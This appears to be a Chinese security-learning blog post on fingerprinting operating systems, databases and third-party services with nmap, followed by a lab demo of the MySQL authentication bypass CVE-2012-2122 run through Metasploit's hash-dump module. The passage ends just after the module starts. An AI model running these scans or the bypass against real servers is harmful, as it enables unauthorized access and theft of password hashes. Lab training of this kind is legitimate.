<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="web安全日志-005, 爱睡懒觉的道士">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>web安全日志-005 | 爱睡懒觉的道士</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

    <!-- 黑夜模式样式 css -->
    <link rel="stylesheet" type="text/css" href="/css/day-night.css">

<meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"><link rel="alternate" href="/atom.xml" title="爱睡懒觉的道士" type="application/atom+xml">
</head>



   <style>
    body{
       background-image: url(https://cdn.jsdelivr.net/gh/Tokisaki-Galaxy/res/site/medias/background.jpg);
       background-repeat:no-repeat;
       background-size:cover;
       background-attachment:fixed;
    }
</style>



<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">爱睡懒觉的道士</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">爱睡懒觉的道士</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/daoshi-sec/daoshi-sec.github.io.git" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/daoshi-sec/daoshi-sec.github.io.git" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/21.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">web安全日志-005</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">web安全</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/web%E5%AE%89%E5%85%A8/" class="post-category">
                                web安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-09-18
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.5k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    12 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="基础入门-系统及数据库"><a href="#基础入门-系统及数据库" class="headerlink" title="基础入门-系统及数据库"></a><font size="6"><strong>基础入门-系统及数据库</strong></font></h2><span id="more"></span>

<p><img src="/2023/09/18/web%E5%AE%89%E5%85%A8%E6%97%A5%E5%BF%97-005/1.png"></p>
<h3 id="一、操作系统层面："><a href="#一、操作系统层面：" class="headerlink" title="一、操作系统层面："></a><font size="5"><strong>一、操作系统层面：</strong></font></h3><h4 id="1、识别操作系统常见方法"><a href="#1、识别操作系统常见方法" class="headerlink" title="1、识别操作系统常见方法"></a><font size="4"><strong>1、识别操作系统常见方法</strong></font></h4><p>a、有网站<br>可以通过网站识别通过网站的手工识别方法判断：<br>windows对大小写不敏感也就是说你在网页中可以替换网站路径的大小写进行测试</p>
<p>b、没有网站<br>通过nmap进行扫描方法：<br>nmap -O IP地址</p>
<pre class=" language-bash"><code class="language-bash">──<span class="token punctuation">(</span>root💀kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/桌面<span class="token punctuation">]</span>
└─<span class="token comment" spellcheck="true"># nmap -O 10.1.1.10 </span>
Starting Nmap 7.91 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2021-06-07 21:06 CST
Nmap scan report <span class="token keyword">for</span> 10.1.1.10 <span class="token punctuation">(</span>10.1.1.10<span class="token punctuation">)</span>
Host is up <span class="token punctuation">(</span>0.0011s latency<span class="token punctuation">)</span>.
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp <span class="token function">open</span>  <span class="token function">ssh</span>
MAC Address: 00:0C:29:13:E9:61 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span>
Device type: general purpose
Running: Linux 3.X<span class="token operator">|</span>4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
</code></pre>
<p>备注：不是所有的系统都可以用这种方式扫描出操作系统的类型、在windows的一些高版本中无法探测，例如：</p>
<pre class=" language-bash"><code class="language-bash">─<span class="token comment" spellcheck="true"># nmap -O 10.1.1.129</span>
Starting Nmap 7.91 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2021-06-07 21:10 CST
Nmap scan report <span class="token keyword">for</span> 10.1.1.129 <span class="token punctuation">(</span>10.1.1.129<span class="token punctuation">)</span>
Host is up <span class="token punctuation">(</span>0.00053s latency<span class="token punctuation">)</span>.
Not shown: 994 closed ports
PORT     STATE SERVICE
80/tcp   <span class="token function">open</span>  http
MAC Address: 00:0C:29:DC:AF:EA <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span>
No exact OS matches <span class="token keyword">for</span> host <span class="token punctuation">(</span>If you know what OS is running on it, see https://nmap.org/submit/ <span class="token punctuation">)</span>.
TCP/IP fingerprint:
OS:SCAN<span class="token punctuation">(</span>V<span class="token operator">=</span>7.91%E<span class="token operator">=</span>4%D<span class="token operator">=</span>6/7%OT<span class="token operator">=</span>80%CT<span class="token operator">=</span>1%CU<span class="token operator">=</span>36041%PV<span class="token operator">=</span>Y%DS<span class="token operator">=</span>1%DC<span class="token operator">=</span>D%G<span class="token operator">=</span>Y%M<span class="token operator">=</span>000C29%TM
OS:<span class="token operator">=</span>60BE1ADE%P<span class="token operator">=</span>x86_64-pc-linux-gnu<span class="token punctuation">)</span>SEQ<span class="token punctuation">(</span>SP<span class="token operator">=</span>106%GCD<span class="token operator">=</span>1%ISR<span class="token operator">=</span>10C%TI<span class="token operator">=</span>I%CI<span class="token operator">=</span>I%II<span class="token operator">=</span>I%
OS:SS<span class="token operator">=</span>S%TS<span class="token operator">=</span>U<span class="token punctuation">)</span>OPS<span class="token punctuation">(</span>O1<span class="token operator">=</span>M5B4NW8NNS%O2<span class="token operator">=</span>M5B4NW8NNS%O3<span class="token operator">=</span>M5B4NW8%O4<span class="token operator">=</span>M5B4NW8NNS%O5<span class="token operator">=</span>M5
OS:B4NW8NNS%O6<span class="token operator">=</span>M5B4NNS<span class="token punctuation">)</span>WIN<span class="token punctuation">(</span>W1<span class="token operator">=</span>FFFF%W2<span class="token operator">=</span>FFFF%W3<span class="token operator">=</span>FFFF%W4<span class="token operator">=</span>FFFF%W5<span class="token operator">=</span>FFFF%W6<span class="token operator">=</span>FF70<span class="token punctuation">)</span>
OS:ECN<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DF<span class="token operator">=</span>Y%T<span class="token operator">=</span>80%W<span class="token operator">=</span>FFFF%O<span class="token operator">=</span>M5B4NW8NNS%CC<span class="token operator">=</span>Y%Q<span class="token operator">=</span><span class="token punctuation">)</span>T1<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DF<span class="token operator">=</span>Y%T<span class="token operator">=</span>80%S<span class="token operator">=</span>O%A<span class="token operator">=</span>S+%
OS:F<span class="token operator">=</span>AS%RD<span class="token operator">=</span>0%Q<span class="token operator">=</span><span class="token punctuation">)</span>T2<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DF<span class="token operator">=</span>Y%T<span class="token operator">=</span>80%W<span class="token operator">=</span>0%S<span class="token operator">=</span>Z%A<span class="token operator">=</span>S%F<span class="token operator">=</span>AR%O<span class="token operator">=</span>%RD<span class="token operator">=</span>0%Q<span class="token operator">=</span><span class="token punctuation">)</span>T3<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DF<span class="token operator">=</span>Y%T<span class="token operator">=</span>
OS:80%W<span class="token operator">=</span>0%S<span class="token operator">=</span>Z%A<span class="token operator">=</span>O%F<span class="token operator">=</span>AR%O<span class="token operator">=</span>%RD<span class="token operator">=</span>0%Q<span class="token operator">=</span><span class="token punctuation">)</span>T4<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DF<span class="token operator">=</span>Y%T<span class="token operator">=</span>80%W<span class="token operator">=</span>0%S<span class="token operator">=</span>A%A<span class="token operator">=</span>O%F<span class="token operator">=</span>R%O<span class="token operator">=</span>%RD<span class="token operator">=</span>0%
OS:Q<span class="token operator">=</span><span class="token punctuation">)</span>T5<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DF<span class="token operator">=</span>Y%T<span class="token operator">=</span>80%W<span class="token operator">=</span>0%S<span class="token operator">=</span>Z%A<span class="token operator">=</span>S+%F<span class="token operator">=</span>AR%O<span class="token operator">=</span>%RD<span class="token operator">=</span>0%Q<span class="token operator">=</span><span class="token punctuation">)</span>T6<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DF<span class="token operator">=</span>Y%T<span class="token operator">=</span>80%W<span class="token operator">=</span>0%S<span class="token operator">=</span>
OS:A%A<span class="token operator">=</span>O%F<span class="token operator">=</span>R%O<span class="token operator">=</span>%RD<span class="token operator">=</span>0%Q<span class="token operator">=</span><span class="token punctuation">)</span>T7<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DF<span class="token operator">=</span>Y%T<span class="token operator">=</span>80%W<span class="token operator">=</span>0%S<span class="token operator">=</span>Z%A<span class="token operator">=</span>S+%F<span class="token operator">=</span>AR%O<span class="token operator">=</span>%RD<span class="token operator">=</span>0%Q<span class="token operator">=</span><span class="token punctuation">)</span>U1<span class="token punctuation">(</span>R<span class="token operator">=</span>
OS:Y%DF<span class="token operator">=</span>N%T<span class="token operator">=</span>80%IPL<span class="token operator">=</span>164%UN<span class="token operator">=</span>0%RIPL<span class="token operator">=</span>G%RID<span class="token operator">=</span>G%RIPCK<span class="token operator">=</span>G%RUCK<span class="token operator">=</span>G%RUD<span class="token operator">=</span>G<span class="token punctuation">)</span>IE<span class="token punctuation">(</span>R<span class="token operator">=</span>Y%DFI<span class="token operator">=</span>N%
OS:T<span class="token operator">=</span>80%CD<span class="token operator">=</span>Z<span class="token punctuation">)</span>
</code></pre>
<p>c、TTL</p>
<pre class=" language-不同的操作系统的默认TTL值是不同的，"><code class="language-不同的操作系统的默认TTL值是不同的，">1、WINDOWS NT/2000   TTL：128
2、WINDOWS 95/98     TTL：32
3、UNIX              TTL：255
4、LINUX             TTL：64
5、WIN7         		  TTL：64
</code></pre>
<p>d、特殊端口 如（22 &#x2F; 139 &#x2F; 445 &#x2F; 1433 &#x2F; 3389）</p>
<h4 id="2、简要两者区别及识别意义"><a href="#2、简要两者区别及识别意义" class="headerlink" title="2、简要两者区别及识别意义"></a><font size="4"><strong>2、简要两者区别及识别意义</strong></font></h4><pre class=" language-bash"><code class="language-bash">区别出不同的操作系统才能对症下药、因为windows和linux的漏洞是不一样的、可能windows的漏洞在windows上就不能运用，
</code></pre>
<h4 id="3、操作系统层面漏洞类型对应意义"><a href="#3、操作系统层面漏洞类型对应意义" class="headerlink" title="3、操作系统层面漏洞类型对应意义"></a><font size="4"><strong>3、操作系统层面漏洞类型对应意义</strong></font></h4><pre class=" language-bash"><code class="language-bash">不同的漏洞会造成不同漏洞利用的条件
</code></pre>
<h4 id="4、简要操作系统层面漏洞影响范围"><a href="#4、简要操作系统层面漏洞影响范围" class="headerlink" title="4、简要操作系统层面漏洞影响范围"></a><font size="4"><strong>4、简要操作系统层面漏洞影响范围</strong></font></h4><pre class=" language-bash"><code class="language-bash">有些漏洞会对操作系统造成崩溃、而有些系统只是蓝屏、或者是权限的提升
</code></pre>
<h3 id="二、数据库层面"><a href="#二、数据库层面" class="headerlink" title="二、数据库层面"></a><font size="5"><strong>二、数据库层面</strong></font></h3><h4 id="1、识别数据库类型常见方法"><a href="#1、识别数据库类型常见方法" class="headerlink" title="1、识别数据库类型常见方法"></a><font size="4"><strong>1、识别数据库类型常见方法</strong></font></h4><p>默认的语言搭配的数据库</p>
<pre class=" language-bash"><code class="language-bash">组合类型asp + access/mssql
组合类型php + mysql 
组合类型aspx+mssql
组合类型jsp +mysql/oracle
组合类型Python + MongoDB
</code></pre>
<p>常见的数据库默认端口号</p>
<pre class=" language-bash"><code class="language-bash">关系型数据库
  mysql			3306
  sqlserver		1433
  oracle		1521
  psotgresql	5432
非关系型数据库
  MongoDB		27017
  Redis			6379
  memcached		11211
其他：
  1527　　      Derby
  5432　　      pgsql
  5000　　      db2
  9092　　      pointbase
  无默认　      Informix
</code></pre>
<h4 id="2、数据库类型区别及识别意义"><a href="#2、数据库类型区别及识别意义" class="headerlink" title="2、数据库类型区别及识别意义"></a><font size="4"><strong>2、数据库类型区别及识别意义</strong></font></h4><pre class=" language-bash"><code class="language-bash">数据库的不同表示的结构也是不同、写法结构也不一样、所以产生的漏洞也不一样。
不同的数据库的攻击方式也不完全一样。
</code></pre>
<h4 id="3、数据库常见漏洞类型及攻击"><a href="#3、数据库常见漏洞类型及攻击" class="headerlink" title="3、数据库常见漏洞类型及攻击"></a><font size="4"><strong>3、数据库常见漏洞类型及攻击</strong></font></h4><pre class=" language-bash"><code class="language-bash">存在弱口令
数据库漏洞
</code></pre>
<h4 id="4、简要数据库层面漏洞影响范围"><a href="#4、简要数据库层面漏洞影响范围" class="headerlink" title="4、简要数据库层面漏洞影响范围"></a><font size="4"><strong>4、简要数据库层面漏洞影响范围</strong></font></h4><pre class=" language-bash"><code class="language-bash">数据库权限
网站权限
修改网页内容
</code></pre>
<h3 id="三、第三方层面"><a href="#三、第三方层面" class="headerlink" title="三、第三方层面"></a><font size="5"><strong>三、第三方层面</strong></font></h3><h4 id="1、如何判断有那些第三方平台或软件"><a href="#1、如何判断有那些第三方平台或软件" class="headerlink" title="1、如何判断有那些第三方平台或软件"></a><font size="4"><strong>1、如何判断有那些第三方平台或软件</strong></font></h4><pre class=" language-bash"><code class="language-bash">通过网站去扫描有些网站安装了第三方的软件如phpmyadmin通过扫描就可以发现他的安装目录
判断安装了第三方软件

端口扫描
nmap -O -sV 10.1.1.130
Starting Nmap 7.91 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2021-06-08 09:26 CST
Nmap scan report <span class="token keyword">for</span> 10.1.1.130 <span class="token punctuation">(</span>10.1.1.130<span class="token punctuation">)</span>
Host is up <span class="token punctuation">(</span>0.00085s latency<span class="token punctuation">)</span>.
Not shown: 978 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   <span class="token function">open</span>  <span class="token function">ftp</span>         vsftpd 2.3.4
22/tcp   <span class="token function">open</span>  <span class="token function">ssh</span>         OpenSSH 4.7p1 Debian 8ubuntu1 <span class="token punctuation">(</span>protocol 2.0<span class="token punctuation">)</span>
23/tcp   <span class="token function">open</span>  telnet      Linux telnetd
25/tcp   <span class="token function">open</span>  smtp        Postfix smtpd
80/tcp   <span class="token function">open</span>  http        Apache httpd 2.2.8 <span class="token punctuation">((</span>Ubuntu<span class="token punctuation">)</span> DAV/2<span class="token punctuation">)</span>
111/tcp  <span class="token function">open</span>  rpcbind     2 <span class="token punctuation">(</span>RPC <span class="token comment" spellcheck="true">#100000)</span>
139/tcp  <span class="token function">open</span>  netbios-ssn Samba smbd 3.X - 4.X <span class="token punctuation">(</span>workgroup: WORKGROUP<span class="token punctuation">)</span>
445/tcp  <span class="token function">open</span>  netbios-ssn Samba smbd 3.X - 4.X <span class="token punctuation">(</span>workgroup: WORKGROUP<span class="token punctuation">)</span>
512/tcp  <span class="token function">open</span>  exec?
513/tcp  <span class="token function">open</span>  login?
514/tcp  <span class="token function">open</span>  tcpwrapped
1099/tcp <span class="token function">open</span>  java-rmi    GNU Classpath grmiregistry
1524/tcp <span class="token function">open</span>  bindshell   Metasploitable root shell
2049/tcp <span class="token function">open</span>  nfs         2-4 <span class="token punctuation">(</span>RPC <span class="token comment" spellcheck="true">#100003)</span>
2121/tcp <span class="token function">open</span>  <span class="token function">ftp</span>         ProFTPD 1.3.1
3306/tcp <span class="token function">open</span>  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp <span class="token function">open</span>  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp <span class="token function">open</span>  vnc         VNC <span class="token punctuation">(</span>protocol 3.3<span class="token punctuation">)</span>
6000/tcp <span class="token function">open</span>  X11         <span class="token punctuation">(</span>access denied<span class="token punctuation">)</span>
6667/tcp <span class="token function">open</span>  irc         UnrealIRCd
8009/tcp <span class="token function">open</span>  ajp13       Apache Jserv <span class="token punctuation">(</span>Protocol v1.3<span class="token punctuation">)</span>
8180/tcp <span class="token function">open</span>  http        Apache Tomcat/Coyote JSP engine 1.1
</code></pre>
<h4 id="2、简要为什么要识别第三方平台或软件"><a href="#2、简要为什么要识别第三方平台或软件" class="headerlink" title="2、简要为什么要识别第三方平台或软件"></a><font size="4"><strong>2、简要为什么要识别第三方平台或软件</strong></font></h4><pre class=" language-bash"><code class="language-bash">不同的第三方软件或工具存在不同的漏洞、识别到更多的信息对收集到的漏洞也就越多
</code></pre>
<h4 id="3、常见第三方平台或软件漏洞类型及攻击"><a href="#3、常见第三方平台或软件漏洞类型及攻击" class="headerlink" title="3、常见第三方平台或软件漏洞类型及攻击"></a><font size="4"><strong>3、常见第三方平台或软件漏洞类型及攻击</strong></font></h4><pre class=" language-bash"><code class="language-bash">弱口令
软件的漏洞攻击
</code></pre>
<h4 id="4、简要第三方平台或软件安全测试的范围"><a href="#4、简要第三方平台或软件安全测试的范围" class="headerlink" title="4、简要第三方平台或软件安全测试的范围"></a><font size="4"><strong>4、简要第三方平台或软件安全测试的范围</strong></font></h4><pre class=" language-bash"><code class="language-bash">直接获取到软件的权限便于进一步的提权和攻击
</code></pre>
<p>补充<br>除去常规wEB安全及APP安全测试外，类似服务器单一或复杂的其他服务（邮件，游戏，负载均衡等），也可以作为安全测试目标，此类目标测试原则只是少了wEB应用或其他安全问题。所以明确安全测试思路是很重要的!</p>
<h3 id="四、演示案例"><a href="#四、演示案例" class="headerlink" title="四、演示案例"></a><font size="5"><strong>四、演示案例</strong></font></h3><h4 id="1、上述涉及的基础知识"><a href="#1、上述涉及的基础知识" class="headerlink" title="1、上述涉及的基础知识"></a><font size="4"><strong>1、上述涉及的基础知识</strong></font></h4><h4 id="2、演示某操作系统层面漏洞"><a href="#2、演示某操作系统层面漏洞" class="headerlink" title="2、演示某操作系统层面漏洞"></a><font size="4"><strong>2、演示某操作系统层面漏洞</strong></font></h4><h4 id="3、演示某数据库弱口令及漏洞演示"><a href="#3、演示某数据库弱口令及漏洞演示" class="headerlink" title="3、演示某数据库弱口令及漏洞演示"></a><font size="4"><strong>3、演示某数据库弱口令及漏洞演示</strong></font></h4><p><font size="3"><strong>方法1</strong></font></p>
<p>漏洞探测</p>
<pre class=" language-bash"><code class="language-bash">参考文档：https://vulhub.org/<span class="token comment" spellcheck="true">#/environments/mysql/CVE-2012-2122/</span>

┌──<span class="token punctuation">(</span>root💀kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~<span class="token punctuation">]</span>
└─<span class="token comment" spellcheck="true"># nmap -O -sV 10.1.1.133</span>
Starting Nmap 7.91 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2021-06-08 11:09 CST
Nmap scan report <span class="token keyword">for</span> 10.1.1.133 <span class="token punctuation">(</span>10.1.1.133<span class="token punctuation">)</span>
Host is up <span class="token punctuation">(</span>0.0011s latency<span class="token punctuation">)</span>.
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   <span class="token function">open</span>  <span class="token function">ssh</span>     OpenSSH 7.4 <span class="token punctuation">(</span>protocol 2.0<span class="token punctuation">)</span>
3306/tcp <span class="token function">open</span>  mysql   MySQL 5.5.23
MAC Address: 00:0C:29:13:E9:61 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span>
Device type: general purpose
Running: Linux 3.X<span class="token operator">|</span>4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="token keyword">.</span>
Nmap done: 1 IP address <span class="token punctuation">(</span>1 host up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 1.88 seconds
</code></pre>
<p>漏洞利用</p>
<pre class=" language-bash"><code class="language-bash">msf6 auxiliary<span class="token punctuation">(</span>scanner/mysql/mysql_hashdump<span class="token punctuation">)</span> <span class="token operator">></span> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary<span class="token punctuation">(</span>scanner/mysql/mysql_authbypass_hashdump<span class="token punctuation">)</span> <span class="token operator">></span> <span class="token keyword">set</span> rhosts 10.1.1.133
rhosts <span class="token operator">=</span><span class="token operator">></span> 10.1.1.133
msf6 auxiliary<span class="token punctuation">(</span>scanner/mysql/mysql_authbypass_hashdump<span class="token punctuation">)</span> <span class="token operator">></span> <span class="token keyword">set</span> threads 10
threads <span class="token operator">=</span><span class="token operator">></span> 10
msf6 auxiliary<span class="token punctuation">(</span>scanner/mysql/mysql_authbypass_hashdump<span class="token punctuation">)</span> <span class="token operator">></span> run

<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 10.1.1.133:3306       - 10.1.1.133:3306 The server allows logins, proceeding with bypass <span class="token function">test</span>
